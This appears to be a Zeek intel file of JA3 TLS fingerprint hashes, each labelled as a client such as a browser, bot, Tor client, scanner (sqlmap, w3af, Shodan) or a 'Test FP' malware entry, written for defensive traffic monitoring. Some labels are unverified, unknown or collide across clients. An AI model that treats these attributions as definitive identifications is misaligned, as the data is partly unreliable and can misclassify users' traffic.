+9e41b6bf545347abccf0dc8fd76083a5	Intel::JA3	ja3	Polycom IP Phone Directory Lookup	F	-
+26fa3da4032424ab61dc9be62c8e3ed0	Intel::JA3	ja3	Postfix with StartTLS	F	-
+561271bdcbfe68504ce78b38c957eef0	Intel::JA3	ja3	Presto 2.12.388	F	-
+4e6f7f036fb2b05a50ee8a686b1176a6	Intel::JA3	ja3	Presto 2.5.24  2.6.30  2.10.229  2.10.289	F	-
+ceee08c3603b53be80c8afdc98babdd6	Intel::JA3	ja3	Presto 2.8.131  2.9.168	F	-
+ef48bf8b2ccaab35642fd0a9f1bbe831	Intel::JA3	ja3	PubNub data stream #1 & Apteligent	F	-
+8cc24a6ff485c62e3eb213d2ca61cf12	Intel::JA3	ja3	PubNub data stream #2	F	-
+12ad03cb3faa2748e92c9a38faab949f	Intel::JA3	ja3	Pusherapp API	F	-
+c398c55518355639c5a866c15784f969	Intel::JA3	ja3	Python Requests Library 2.4.3	F	-
+c22dea495cef869edbeb3458adaf497f	Intel::JA3	ja3	Rapid7 Nexpose	F	-
+4b06b445e3e12cdae777cec815ab90f5	Intel::JA3	ja3	Reported as -	F	-
+90f755509cba37094eb66be02335b932	Intel::JA3	ja3	RingCentral App (unknown platform) #2	F	-
+7743db23afb26f18d632420e6c36e076	Intel::JA3	ja3	RingCentral App (unknown platform)	F	-
+24339ea346521d98a8c50fd3713090c9	Intel::JA3	ja3	SSLPing Scanner 1	F	-
+ad5d6f490f3819dc60b2a2fbe5bd1cba	Intel::JA3	ja3	SSLPing Scanner 2	F	-
+1e9557c377f8ff50b80b7f87b60b1054	Intel::JA3	ja3	SSLPing Scanner 3	F	-
+c3c59ec21835721c92571e7742fadb88	Intel::JA3	ja3	SSLPing Scanner 4	F	-
+cbcd1d81f242de31fd683d5acbc70dca	Intel::JA3	ja3	Safari 525 - 533  534.57.2	F	-
+cbcd1d81f242de31fd683d5acbc70dca	Intel::JA3	ja3	Safari 525.21  525.29  531.22.7  533.21.1  534.57.2 / Adobe Reader DC 15.x Updater	F	-
+30701f5050d504c31805594fb5c083b8	Intel::JA3	ja3	Safari 534.34	F	-
+4c551900711d12c864cfe2f95e1c98c2	Intel::JA3	ja3	Safari 534.34	F	-
+41ba55231de6643721fbe2ae25fab85d	Intel::JA3	ja3	Safari 534.34	F	-
+fb1d89e16f4dd558ad99011070785cce	Intel::JA3	ja3	Safari 534.59.8	F	-
+e2a482fbb281f7662f12ff6cc871cfe7	Intel::JA3	ja3	Safari 536.30.1	F	-
+cc5925c4720edb550491a12a35c15d4d	Intel::JA3	ja3	Safari 537.71	F	-
+88770e3ad9e9d85b2e463be2b5c5a026	Intel::JA3	ja3	Safari 537.78.2	F	-
+77310efe11f1943306ee317cf02150b7	Intel::JA3	ja3	Safari/534.57.2	F	-
+41ba55231de6643721fbe2ae25fab85d	Intel::JA3	ja3	Safari/537.21	F	-
+fa8b8ed07b1dd0e4a262bd44d31251ec	Intel::JA3	ja3	ShadowServer Scanner 1	F	-
+c05809230e9f7a6bf627a48b72dc4e1c	Intel::JA3	ja3	ShadowServer Scanner 2	F	-
+0ad94fcb7d3a2c56679fbd004f6b12cd	Intel::JA3	ja3	ShadowServer Scanner 3	F	-
+0b63812a99e66c82a20d30c3b9ba6e06	Intel::JA3	ja3	Shodan	F	-
+f59a024cf47fdb835053ebf144189a47	Intel::JA3	ja3	Shodan	F	-
+0b63812a99e66c82a20d30c3b9ba6e06	Intel::JA3	ja3	Shodan	F	-
+302579fd4ba13eca27932664f66725ad	Intel::JA3	ja3	Shodan	F	-
+109dbd9238634b21363c3d62793c029c	Intel::JA3	ja3	Shodan	F	-
+0add6ceb611a7613f97329af3b6828d9	Intel::JA3	ja3	Shodan	F	-
+3fcc12d9ee1f75a0212d1d16f7b9f8ad	Intel::JA3	ja3	Shodan	F	-
+badc09d74edf43c0204c4827a038c2fa	Intel::JA3	ja3	Shodan	F	-
+f8f522671d2d2eba5803e6c002760c05	Intel::JA3	ja3	Shodan	F	-
+9d5869f950eeca2e39196c61fdf510c8	Intel::JA3	ja3	Shodan	F	-
+11e49581344c117df2c9ceb46e5594c4	Intel::JA3	ja3	Shodan	F	-
+7dde4e4f0dceb29f711fb34b4bdbf420	Intel::JA3	ja3	Signal (tested: 3.16.0 - Android)	F	-
+07931ada5b9dd93ec706e772ee60782d	Intel::JA3	ja3	Signal Chrome App	F	-
+cfb6d1c72d09d4eaa4c7d2c0b1ecbce7	Intel::JA3	ja3	SkipFish (tested: v2.10b kali)	F	-
+7a75198d3e18354a6763860d331ff46a	Intel::JA3	ja3	Skype (additional Win 10)	F	-
+06207a1730b5deeb207b0556e102ded2	Intel::JA3	ja3	Skype (multiple platforms)	F	-
+5ef08bc989a9fcc18d5011f07d953c14	Intel::JA3	ja3	Skype (tested 7.18(341) on OSX)	F	-
+c8ada45922a3e7857e4bfd4fc13e8f64	Intel::JA3	ja3	Slack Desktop App	F	-
+3d72e4827837391cd5b6f5c6b2d5b1e1	Intel::JA3	ja3	Slack	F	-
+22cca8ed59288f4984724f0ee03484ea	Intel::JA3	ja3	Slackbot Link Expander	F	-
+f51156bcd5033603e750c8bd4db254e3	Intel::JA3	ja3	SpiderOak (tested: 6.0.1)	F	-
+cab4a6a0c7ac91c2bd9e93cb0507ad4e	Intel::JA3	ja3	Synology DDNS Beacon	F	-
+24993abb75ddda7eaf0709395e47ab4e	Intel::JA3	ja3	Tenable Passive Vulnerability Scanner Plugin Updater	F	-
+74927e242d6c3febf8cb9cab10a7f889	Intel::JA3	ja3	Test FP: Dridex Malware	F	-
+f3603b5b21cdb30f2a089b78fc2dde0d	Intel::JA3	ja3	Test FP: Nuclear Exploit Kit	F	-
+4d7a28d6f2263ed61de88ca66eb011e3	Intel::JA3	ja3	Test FP: Nuclear Exploit Kit	F	-
+38aea89b122f799954cf3f4e8878498b	Intel::JA3	ja3	Test FP: Tweetdeck maybe Webkit	F	-
+97d3b9036d5a4d7f1fe33fe730f38231	Intel::JA3	ja3	TextSecure Name Lookup (Tested: Android)	F	-
+207409c2b30e670ca50e1eac016a4831	Intel::JA3	ja3	ThunderBird (v17.0 OS X)	F	-
+4623da8b4586a8a4b86e31d689aa0c15	Intel::JA3	ja3	ThunderBird (v38.0.1 OS X)	F	-
+6fd163150b060dd7d07add280f42f4ed	Intel::JA3	ja3	ThunderBird (v38.0.1 OS X)	F	-
+4623da8b4586a8a4b86e31d689aa0c15	Intel::JA3	ja3	Thunderbird 38.7.0 (openSUSE Leap 42.1)	F	-
+0ed768d6e3bc66af60d31315afd423f2	Intel::JA3	ja3	Tor Browser (tested: 5.0.1f - May clash with FF38)	F	-
+8c9a7fe81ba61dab1454e08f42f0a004	Intel::JA3	ja3	Tor Browser (v4.5.3 OS X - based on FF 31.8.0)	F	-
+5b3eee2766b876e623ba05508d269830	Intel::JA3	ja3	Tor Relay Traffic (tested 0.2.7.6)	F	-
+79f0842a32b359d1b683c569bd07f23b	Intel::JA3	ja3	Tor Relay Traffic (tested 0.2.7.6)	F	-
+79f0842a32b359d1b683c569bd07f23b	Intel::JA3	ja3	Tor Uplink (via Tails distro)	F	-
+659007d8bae74d1053f6ca4a329d25a7	Intel::JA3	ja3	Tor uplink (tested: 0.2.6.10)	F	-
+bc329d2a71e749067424502f1f72e13a	Intel::JA3	ja3	Tracking something (noted with Dropbox Installer & Skype - Win 10)	F	-
+aea96546ac042f29fed1e2203a9b4c3f	Intel::JA3	ja3	Trident/7.0	F	-
+2a458dd9c65afbcf591cd8c2a194b804	Intel::JA3	ja3	Trident/7.0	F	-
+9a1c3fed39b016b8d81cc77dae70f60f	Intel::JA3	ja3	UMich Scanner (can use: zgrab)	F	-
+0e580f864235348848418123f96bbaa0	Intel::JA3	ja3	UMich Scanner (can use: zgrab)	F	-
+dc76bc3a4e3bc38939dfd90d8b7214b7	Intel::JA3	ja3	UMich Scanner (can use: zgrab)	F	-
+f6bae8bacf93b5e97e80b594ffeba859	Intel::JA3	ja3	UNVERIFIED: May be BlueCoat proxy	F	-
+b9b4d1f7283b5ddc59d0b8d15e386106	Intel::JA3	ja3	Ubuntu Software Center	F	-
+633e9558d4b25b46e8b1c49e10faaff4	Intel::JA3	ja3	Ubuntu Software Center	F	-
+ac206b75530d569a0a64cec378eb4b66	Intel::JA3	ja3	Ubuntu Web Socket #1	F	-
+94feb9008aeb393e76bac31b30af6ad0	Intel::JA3	ja3	Ubuntu Web Socket #2	F	-
+f1b7bbeb8b79cecd728c72bba350d173	Intel::JA3	ja3	Ubuntu Web Socket #3	F	-
+3f00755c412442e642f5572ed4f2eaf2	Intel::JA3	ja3	Ubuntu Web Socket #4	F	-
+90f6c4b0577fb24a31bea0acc1fcc27d	Intel::JA3	ja3	Unidentified attack tool	F	-
+26cdef14ec70c2d6ebd943fe8069c4da	Intel::JA3	ja3	Unknown SMTP Server (used by Facebook)	F	-
+23a9b0eb3584e358816a123c208a2c8b	Intel::JA3	ja3	Unknown SMTP server (207.46.100.103)	F	-
+18e9afaf91db6f8a2470e7435c2a1d6b	Intel::JA3	ja3	Unknown TLS Scanner	F	-
+4392ae644e5a440b3b5f84b490893589	Intel::JA3	ja3	Unknown: 192.168.1.23:53352 -> 95.85.50.201:443	F	-
+7bc3475b771c44c764614397da069d28	Intel::JA3	ja3	Unknown: BrowserStack timeframe SMTP STARTLS	F	-
+335ec05b3ddb3800a8df47641c2d8e33	Intel::JA3	ja3	Unknown: Something on Android that talks to Google Analytics.. help	F	-
+81fb3e51bf3f18c5755146c28d07431b	Intel::JA3	ja3	VLC	F	-
+cff90930827e8b0f4e5a6fcc17319954	Intel::JA3	ja3	VMWare Fusion / Workstation / Player Update Check 8.x-12.x	F	-
+48e69b57de145720885af2894f2ab9e7	Intel::JA3	ja3	VMware vSphere Client (Tested v4.1.0)	F	-
+2d96ffb535c7c7a30cad924b9b9f2b52	Intel::JA3	ja3	Valve Steam Client #1	F	-
+ab1fa6468096ab057291aa381d5de2b7	Intel::JA3	ja3	Valve Steam Client #2	F	-
+41e3681b7c8c915e33b1f80d275c19d5	Intel::JA3	ja3	VirtualBox Update Poll (tested 5.0.8 r103449)	F	-
+4c8ff2ddb1890482e5989b80e48b54d4	Intel::JA3	ja3	WPScan (tested: 2.9 Kali)	F	-
+0172e9e41a8940e6a809967e4835214a	Intel::JA3	ja3	Web	F	-
+58d97971a14d0520c5c56caa75470948	Intel::JA3	ja3	WebKit per Safari 9.0.1 (11601.2.7.2)	F	-
+9ef7a86952e78eeb83590ff4d82a5538	Intel::JA3	ja3	WebKit per Safari 9.0.1 (11601.2.7.2)	F	-
+8e1172bd5dcc4698928c7eb454a2c3de	Intel::JA3	ja3	WeeChat	F	-
+444434ebe3f52b8453c3803bff077ebd	Intel::JA3	ja3	Wii-U	F	-
+c8d1364bba308db5a4a20c65c58ffde1	Intel::JA3	ja3	Win default thing a la webkit	F	-
+aee020803d10a4d39072817184c8eedc	Intel::JA3	ja3	Windows 10 Native Connection	F	-
+205200cdaac61b110838556b834070d1	Intel::JA3	ja3	Windows 10 WebSockets (inc Edge) #1	F	-
+5a0fa8873e5ffe7d9385647adc8912d7	Intel::JA3	ja3	Windows 10 WebSockets (inc Edge) #2	F	-
+a7b2f0639f58f97aec151e015be1f684	Intel::JA3	ja3	Windows 8.x Apps Store thing (unconfirmed)	F	-
+0d15924fe8f8950a3ec3a916e97c8498	Intel::JA3	ja3	Windows 8.x Builtin Mail Client	F	-
+a8ee937cf82bb0972fecc23d63c9cd82	Intel::JA3	ja3	Windows 8.x TLS Socket	F	-
+4025f224557638ee81afc4f272fd7577	Intel::JA3	ja3	Windows Diagnostic and Telemetry (also Security Essentials and Microsoft Defender) (Tested Win7)	F	-
+2db6873021f2a95daa7de0d93a1d1bf2	Intel::JA3	ja3	Windows Java Plugin (tested: v8 Update 60)	F	-
+de364c46b0dfc283b5e38c79ceae3f8f	Intel::JA3	ja3	Yahoo! Slurp Indexer	F	-
+1202a58b454f54a47d2c216567ebd4fb	Intel::JA3	ja3	Yahoo! Slurp Indexer	F	-
+d83881675de3f6aacbcc0b2bae6f8923	Intel::JA3	ja3	Yandex Bot	F	-
+f8f5b71e02603b283e55b50d17ede861	Intel::JA3	ja3	Zite (Android) 1 - May collide with Chrome	F	-
+5ae88f37a16f1b054f2edff1c8730471	Intel::JA3	ja3	Zite (Android) 2 - May collide with Chome	F	-
+4e5e5d9fbc43697be755696191fe649a	Intel::JA3	ja3	atom.io #1	F	-
+c94858c6eb06de179493b3fac847143e	Intel::JA3	ja3	atom.io #2	F	-
+764b8952983230b0ac23dbd3741d2bb0	Intel::JA3	ja3	curl (tested: 7.22.0 on Linux)	F	-
+9f198208a855994e1b8ec82c892b7d37	Intel::JA3	ja3	curl (tested: 7.43.0 OS X)	F	-
+c458ae71119005c8bc26d38a215af68f	Intel::JA3	ja3	curl 7.35.0 (tested Ubuntu 14.x  openssl 1.0.1f)	F	-
+e14d427fab707af91e4bbd0bf03076f8	Intel::JA3	ja3	curl 7.37.0 / links 2.8 / git 2.6.6 (openSUSE Leap 42.1)	F	-
+f672d8f0e827ca1e704a9489b14dd316	Intel::JA3	ja3	curl	F	-
+e3891da2a758d67ba921e5eec0b9707d	Intel::JA3	ja3	curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.16.2.3 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2	F	-
+a698fe6c52d210e3376bb6667729d4d2	Intel::JA3	ja3	fetchmail 6.3.26 (openSUSE Leap 42.1)	F	-
+3e765b7a69050906e5e48d020921b98e	Intel::JA3	ja3	git commandline (tested: 1.9. Linux)	F	-
+f11b0fca6c063aa69d8d39e0d68b6178	Intel::JA3	ja3	golang (tested: 1.4.1)	F	-
+318b9778e96efb5090c43b514c7ab184	Intel::JA3	ja3	https://www.virustotal.com/file/07853289247c4c932ddfbf4c215b4e86240fab6661a6d6a85ac8ee37fe92b9be/analysis/1433596684/	F	-
+dc08cf4510f70bf16d4106ee22f89197	Intel::JA3	ja3	iOS AppleWebKit/534.46	F	-
+06d930b072bf052b10d0a9eea1554f60	Intel::JA3	ja3	iOS AppleWebKit/536.26	F	-
+99204897b101b15f87e9b07f67453f4e	Intel::JA3	ja3	iOS Mail App (tested: iOS 9.3.3)	F	-
+c6ecc5ba2a6ab724a7430fa4890d957d	Intel::JA3	ja3	iTunes/iBooks #1	F	-
+c07295da5465d5705a38f044e53ef7c4	Intel::JA3	ja3	iTunes/iBooks #2	F	-
+4d01f8b1afc22e138127611b62f1e6ec	Intel::JA3	ja3	mitmproxy	F	-
+8ef6a005eae3d51b652ffe41984f8869	Intel::JA3	ja3	mitmproxy	F	-
+9d5869f950eeca2e39196c61fdf510c8	Intel::JA3	ja3	mutt (tested: 1.5.23 - OS X)	F	-
+dc7c914e1817944435dd6b82a8495fbb	Intel::JA3	ja3	mutt (tested: 1.5.23 OSX)	F	-
+3fcc12d9ee1f75a0212d1d16f7b9f8ad	Intel::JA3	ja3	mutt (tested: 1.6.2 OS X)	F	-
+6761a36cfa692fcd3bc7d570b23cc168	Intel::JA3	ja3	mutt	F	-
+6fffa2be612102d25dbed5f433b8238c	Intel::JA3	ja3	openssl s_client / msmtp 1.6.2 (openSUSE Leap 42.1)	F	-
+3b6da2971936ac24457616e8ad46f362	Intel::JA3	ja3	osc (python openSUSE Leap 42.1) 1	F	-
+95baa3d2068d8c8da71990a353cf8453	Intel::JA3	ja3	osc (python openSUSE Leap 42.1) 2	F	-
+16765fe48127809dc0ca406769c9391e	Intel::JA3	ja3	php script (tested 5.5.27)	F	-
+ba502b2f5d64ac3d1d54646c0d6dd4dc	Intel::JA3	ja3	py2app application (including box.net & google drive clients)	F	-
+1a9fb04aa1b4439666672be8661f9386	Intel::JA3	ja3	python-requests/2.7.0 CPython/2.6.6 Linux/2.6.32-504.23.4.el6.x86_64	F	-
+30701f5050d504c31805594fb5c083b8	Intel::JA3	ja3	rekonq1.1  Arora0.11.0	F	-
+688b34ca00a291ece0bc07b264b1344c	Intel::JA3	ja3	ruby script (tested: 2.0.0p481)	F	-
+615788655a0e65b71e47c3ebe2302564	Intel::JA3	ja3	sqlmap (tested: v1.0-dev kali)	F	-
+1ab5d0f756e0692a975fda9a6474969f	Intel::JA3	ja3	sqlmap (tested: v1.0.7.0 OS X)	F	-
+3b8f3ace50a7c7cd5205af210f17bb70	Intel::JA3	ja3	tor uplink (tested 0.2.2.35)	F	-
+10a686de1c41107df06c21df245e24cd	Intel::JA3	ja3	w3af (tested: v1.6.54 Kali 1)	F	-
+f13e6d84b915e17f76fdf4ea8c959b4d	Intel::JA3	ja3	w3af (tested: v1.6.54 Kali 2)	F	-
+345b5717dae9006a8bcd4cb1a5f09891	Intel::JA3	ja3	w3af (tested: v1.6.54 Kali 3)	F	-
+74ebac04b642a0cab032dd46e8099fdc	Intel::JA3	ja3	w3c HTML Validator	F	-
+4056657a50a8a4e5cfac40ba48becfa2	Intel::JA3	ja3	w3c HTML Validator	F	-
+975ef0826e8485f2335db71873cb34c6	Intel::JA3	ja3	w3m (tested: 0.5.3 OS X)	F	-
+6b4b535249a1dcd95e3b4b6e9e572e5e	Intel::JA3	ja3	w3m 0.5.3 (OS X version)	F	-
+575771dbc723df24b764ac0303c19d10	Intel::JA3	ja3	w3m 0.5.3 / lynx 3.2 / svn 1.8.10 (openSUSE Leap 42.1)	F	-
+5f1d4c631ddedf942033c9ae919158b8	Intel::JA3	ja3	wget (tested GNU Wget 1.16.1 & 1.17 on OS X)	F	-
+70663c6da28b3b9ac281d7b31d6b97c3	Intel::JA3	ja3	wget 1.14 (openSUSE Leap 42.1)	F	-
+d83881675de3f6aacbcc0b2bae6f8923	Intel::JA3	ja3	wget 1.18	F	-
+11404429d240670cc018bed04e918b6f	Intel::JA3	ja3	youtube-dl 2016.06.03 (openSUSE Leap 42.1)	F	-
+cdd8179dc9c0e4802f557b62bae73d43	Intel::JA3	ja3	Slack	F	-
+888ecd3b5821a497195932b0338f2f12	Intel::JA3	ja3	MS Edge	F	-
+5bf43fbca3454853c26df6d996954aca	Intel::JA3	ja3	MS Edge	F	-
+21ed4c7ee1daeb84c72199ceaf119b24	Intel::JA3	ja3	Dropbox Client	F	-
+123b8f4705d525caffa3f2b36447f481	Intel::JA3	ja3	Win10 Mail Client	F	-
+f8e42933ba5b3990858ba621489047e3	Intel::JA3	ja3	Dropbox Client	F	-
+30b168d81e38d9a55c474c1e30eaf9f9	Intel::JA3	ja3	Dropbox Client	F	-
+388a4049af7e631f8d36eb0f909de65a	Intel::JA3	ja3	One Drive	F	-
+a1ec6fd012b9ee6f84c50339c4205270	Intel::JA3	ja3	HTTRack	F	-
+5182f54f9c6e99d117d9dde3fa2b4cff	Intel::JA3	ja3	BlueCoat Proxy	F	-
+bedb7e0ff43a24272eb0a41993c65faf	Intel::JA3	ja3	Microsoft Smartscreen	F	-
+8c5a50f1e833ed581e9cfc690814719a	Intel::JA3	ja3	BurpSuite Free (Tested: 1.7.03 on Windows 10)	F	-
+2db6873021f2a95daa7de0d93a1d1bf2	Intel::JA3	ja3	BurpSuite Free (Tested: 1.7.03 on Windows 10)	F	-
+a7f2d0376cdcfde3117bf6a8359b2ab8	Intel::JA3	ja3	Chrome Version 49.0.2623,87 (64-bit) Linux	F	-
+8a8159e6abf9fe493ca87efc38855149	Intel::JA3	ja3	Chrome Version 49.0.2623,87 (64-bit) Linux	F	-
+e330bca99c8a5256ae126a55c4c725c5	Intel::JA3	ja3	Chrome Version 57.0.2987.110 (64-bit) Linux	F	-
+d551fafc4f40f1dec2bb45980bfa9492	Intel::JA3	ja3	Chrome Version 57.0.2987.110 (64-bit) Linux	F	-
+ce694315cbb81ce95e6ae4ae8cbafde6	Intel::JA3	ja3	Firefox/31 Linux	F	-
+edf844351bc867631b5ebceda318669b	Intel::JA3	ja3	Firefox/38 Linux	F	-
+4e66f5ad78f3d9ad8d5c7c88d138db43	Intel::JA3	ja3	Firefox/52 Linux	F	-
+0ffee3ba8e615ad22535e7f771690a28	Intel::JA3	ja3	Firefox/55/56 Mac/Win/Linux	F	-
+d3b972883dfbd24fd20fc200ad8ab22a	Intel::JA3	ja3	Chrome Version 61.0.3163,100(64-bit) Win10	F	-
+94c485bca29d5392be53f2b8cf7f4304	Intel::JA3	ja3	Chrome Version 60/61.0.3163	F	-
+bc6c386f480ee97b9d9e52d472b772d8	Intel::JA3	ja3	Chrome Version 60/61.0.3163	F	-
+fee8ec956f324c71e58a8c0baf7223ef	Intel::JA3	ja3	IE 11 Win10	F	-
+2c14bfb3f8a2067fbc88d8345e9f97f3	Intel::JA3	ja3	Windows Watson WCEI Telemetry Gather	F	-
+847b0c334fd0f6f85457054fabff3145	Intel::JA3	ja3	Firefox/14.0.1 Linux	F	-
+a50a861119aceb0ccc74902e8fddb618	Intel::JA3	ja3	VMWare Update Check 6.x	F	-
+f7baf7d9da27449e823a4003e14cd623	Intel::JA3	ja3	Debian APT-CURL/1.0 (1.2.15)	F	-
+07b4162d4db57554961824a21c4a0fde	Intel::JA3	ja3	Firefox/45.0 Linux	F	-
+c07cb55f88702033a8f52c046d23e0b2	Intel::JA3	ja3	Safari/604.1.38 Macintosh	F	-
+3e4e87dda5a3162306609b7e330441d2	Intel::JA3	ja3	Safari/604.3.1 Macintosh	F	-
+83e04bc58d402f9633983cbf22724b02	Intel::JA3	ja3	Chrome/56.0.2924.87 Linux	F	-
+9811c1bb9f0f6835d5c13a831cca4173	Intel::JA3	ja3	Chrome/59.0.3071.115 Win10	F	-
+87c6dda19108d68e526a72d9ae09fb9e	Intel::JA3	ja3	Mobile Safari/537.35+ BB10	F	-
+def8761e4bcaaf91d99801a22ac6f6d4	Intel::JA3	ja3	Chrome/60.0.3112.113 Win10	F	-
+248bdbc3873396b05198a7e001fbd49a	Intel::JA3	ja3	Chrome/49.0.2623.112 WinXP	F	-
+d8844f000e5571807e9094e0fcd795fe	Intel::JA3	ja3	SCRAPER: DotBot	F	-
+ec2e8760003621ca668b5f03e616cd57	Intel::JA3	ja3	Debian APT-CURL/1.0 (1.2.20+)	F	-
+ce5f3254611a8c095a3d821d44539877	Intel::JA3	ja3	SCANNER: wordpress wp-login Firefox/40.1	F	-
+9a35e493f961ac377f948690b5334a9c	Intel::JA3	ja3	SCANNER: hoax Firefox/40.1	F	-
+a1cb2295baf199acf82d11ba4553b4a8	Intel::JA3	ja3	BOT: GoogleBot	F	-
+706567223fbf37d112fba2d95b8ecac3	Intel::JA3	ja3	BOT: Qwant	F	-
+5c1c89f930122bccc7a97d52f73bea2c	Intel::JA3	ja3	BOT: Ahrefs	F	-
+7e72698146290dd68239f788a452e7d8	Intel::JA3	ja3	iPhone OS 10_3_3 Safari 602.1	F	-
+a9aecaa66ad9c6cfe1c361da31768506	Intel::JA3	ja3	iPad; CPU OS 9_3_5  Safari 601.1	F	-
+3ca5d63fa122552463772d3e87d276f2	Intel::JA3	ja3	inoreader.com-like FeedFetcher-Google	F	-
+05e15a226e00230c416a8cdefeb483c7	Intel::JA3	ja3	SCRAPER: yandex.ru based Mozilla 4.0; MSIE 8.0; Windows NT 5.1;	F	-
+d82cbe0b93f2b02d490a14f6bc1d421a	Intel::JA3	ja3	PaleMoon Browser;  PaleMoon/27.4.2	F	-
+35c0a31c481927f022a3b530255ac080	Intel::JA3	ja3	RSiteAuditor	F	-
+37f691b063c10372135db21579643bf1	Intel::JA3	ja3	urlgrabber/3.10 yum/3.4.3	F	-
+f22bdd57e3a52de86cda40da2d84e83b	Intel::JA3	ja3	Feedly/1.0	F	-
+11e1137464a4343105031631d470cd92	Intel::JA3	ja3	mj12bot.com	F	-
+edcf2fd479271286879efebd22bc8d16	Intel::JA3	ja3	Twitterbot/1.0	F	-
+3ca5d63fa122552463772d3e87d276f2	Intel::JA3	ja3	inoreader.com 	F	-
+6cc3c7debc31952d05ecaacb6021925f	Intel::JA3	ja3	SeznamBot/3.2	F	-
+111da7c75fee7fe934b35a8d88eb350a	Intel::JA3	ja3	CRAWLER: facebookexternalhit/1.1	F	-
+61d0d709fe7ac199ef4b2c52bc8cef75	Intel::JA3	ja3	Firefox/51.0 Windows 10	F	-
+be1a7de97ea176604a3c70622189d78d	Intel::JA3	ja3	Firefox/56.0 Windows 10	F	-
+05af1f5ca1b87cc9cc9b25185115607d	Intel::JA3	ja3	Firefox/40.1 Windows 7	F	-
+1885aa9927f99ed538ed895d9335995c	Intel::JA3	ja3	Firefox/55 Windows 10	F	-
+61d50e7771aee7f2f4b89a7200b4d45e	Intel::JA3	ja3	AcroCEF	F	-
+49a6cf42956937669a01438f26e7c609	Intel::JA3	ja3	AIM	F	-
+561145462cfc7de1d6a97e93d3264786	Intel::JA3	ja3	Airmail 3	F	-
+f6fd83a21f9f3c5f9ff7b5c63bbc179d	Intel::JA3	ja3	Alation Compose	F	-
+6003b52942a2e1e1ea72d802d153ec08	Intel::JA3	ja3	Amazon Music	F	-
+eb149984fc9c44d85ed7f12c90d818be	Intel::JA3	ja3	Amazon Music,Dreamweaver,Spotify	F	-
+8e3f1bf87bc652a20de63bfd4952b16a	Intel::JA3	ja3	AnypointStudio	F	-
+5507277945374659a5b4572e1b6d9b9f	Intel::JA3	ja3	apple.geod	F	-
+f753495f2eab5155c61b760c838018f8	Intel::JA3	ja3	apple.geod	F	-
+ba40fea2b2638908a3b3b482ac78d729	Intel::JA3	ja3	apple.geod,parsecd,apple.photomoments	F	-
+474e73aea21d1e0910f25c3e6c178535	Intel::JA3	ja3	apple.WebKit.Networking	F	-
+eeeb5e7485f5e10cbc39db4cfb69b264	Intel::JA3	ja3	apple.WebKit.Networking	F	-
+d4693422c5ce1565377aca25940ad80c	Intel::JA3	ja3	apple.WebKit.Networking,CalendarAgent,Go for Gmail	F	-
+63de2b6188d5694e79b678f585b13264	Intel::JA3	ja3	apple.WebKit.Networking,Chatter,FieldServiceApp,socialstudio	F	-
+3e4e87dda5a3162306609b7e330441d2	Intel::JA3	ja3	apple.WebKit.Networking,itunesstored	F	-
+7b343af1092863fdd822d6f10645abfb	Intel::JA3	ja3	apple.WebKit.Networking,itunesstored	F	-
+a312f9162a08eeedf7feb7a13cd7e9bb	Intel::JA3	ja3	apple.WebKit.Networking,Spotify,WhatsApp,Skype,iTunes	F	-
+c5c11e6105c56fd29cc72c3ac7a2b78b	Intel::JA3	ja3	AT&T Connect	F	-
+fa030dbcb2e3c7141d3c2803780ee8db	Intel::JA3	ja3	Battle.net,Dropbox	F	-
+0ef9ca1c10d3f186f5786e1ef3461a46	Intel::JA3	ja3	bitgo,ShapeShift	F	-
+cdec81515ccc75a5aa41eb3db22226e6	Intel::JA3	ja3	BlueJeans,CEPHtmlEngine	F	-
+83e04bc58d402f9633983cbf22724b02	Intel::JA3	ja3	Charles,Google Play Music Desktop Player,Postman,Slack,and other desktop programs	F	-
+424008725394c634a4616b8b1f2828a5	Intel::JA3	ja3	Charles,java,eclipse	F	-
+be9f1360cf52dc1f61ae025252f192a3	Intel::JA3	ja3	Chromium	F	-
+def8761e4bcaaf91d99801a22ac6f6d4	Intel::JA3	ja3	Chromium	F	-
+fc5cb0985a5f5e295163cc8ffff8a6e1	Intel::JA3	ja3	Chromium	F	-
+e7d46c98b078477c4324031e0d3b22f5	Intel::JA3	ja3	Cisco AnyConnect Secure Mobility Client	F	-
+ed36017db541879619c399c95e22067d	Intel::JA3	ja3	Cisco AnyConnect Secure Mobility Client	F	-
+5ee1a653fb824db7182714897fd3b5df	Intel::JA3	ja3	Citrix Viewer	F	-
+a9d17f74e55dd53fcf7c234f8a240919	Intel::JA3	ja3	Covenant Eyes	F	-
+c882d9444412c00e71b643f3f54145ff	Intel::JA3	ja3	Creative Cloud	F	-
+bc0608d33dc64506b42f7f5f87958f37	Intel::JA3	ja3	cscan	F	-
+4fcd1770545298cc119865aeba81daba	Intel::JA3	ja3	Deezer	F	-
+4c40bf8baa7c301c5dba8a20bc4119e2	Intel::JA3	ja3	Dynalist,Postman,Google Chrome,Franz,GOG Galaxy	F	-
+0411bbb5ff27ad46e1874a7a8beedacb	Intel::JA3	ja3	eclipse	F	-
+4990c9da08f44a01ecd7ddc3837caf25	Intel::JA3	ja3	eclipse	F	-
+fa106fe5beec443af7e211ef8902e7e0	Intel::JA3	ja3	eclipse	F	-
+d74778f454e2b047e030b291b94dd698	Intel::JA3	ja3	eclipse,java	F	-
+187dfde7edc8ceddccd3deeccc21daeb	Intel::JA3	ja3	eclipse,java,studio,STS	F	-
+8c5a50f1e833ed581e9cfc690814719a	Intel::JA3	ja3	eclipse,JavaApplicationStub,idea	F	-
+1fbe5382f9d8430fe921df747c46d95f	Intel::JA3	ja3	FieldServiceApp,socialstudio	F	-
+0a81538cf247c104edb677bdb8902ed5	Intel::JA3	ja3	firefox	F	-
+0b6592fd91d4843c823b75e49b43838d	Intel::JA3	ja3	firefox	F	-
+0ffee3ba8e615ad22535e7f771690a28	Intel::JA3	ja3	firefox	F	-
+1c15aca4a38bad90f9c40678f6aface9	Intel::JA3	ja3	firefox	F	-
+5163bc7c08f57077bc652ec370459c2f	Intel::JA3	ja3	firefox	F	-
+a88f1426c4603f2a8cd8bb41e875cb75	Intel::JA3	ja3	firefox	F	-
+b03910cc6de801d2fcfa0c3b9f397df4	Intel::JA3	ja3	firefox	F	-
+bfcc1a3891601edb4f137ab7ab25b840	Intel::JA3	ja3	firefox	F	-
+ce694315cbb81ce95e6ae4ae8cbafde6	Intel::JA3	ja3	firefox	F	-
+f15797a734d0b4f171a86fd35c9a5e43	Intel::JA3	ja3	firefox	F	-
+07b4162d4db57554961824a21c4a0fde	Intel::JA3	ja3	firefox,thunderbird	F	-
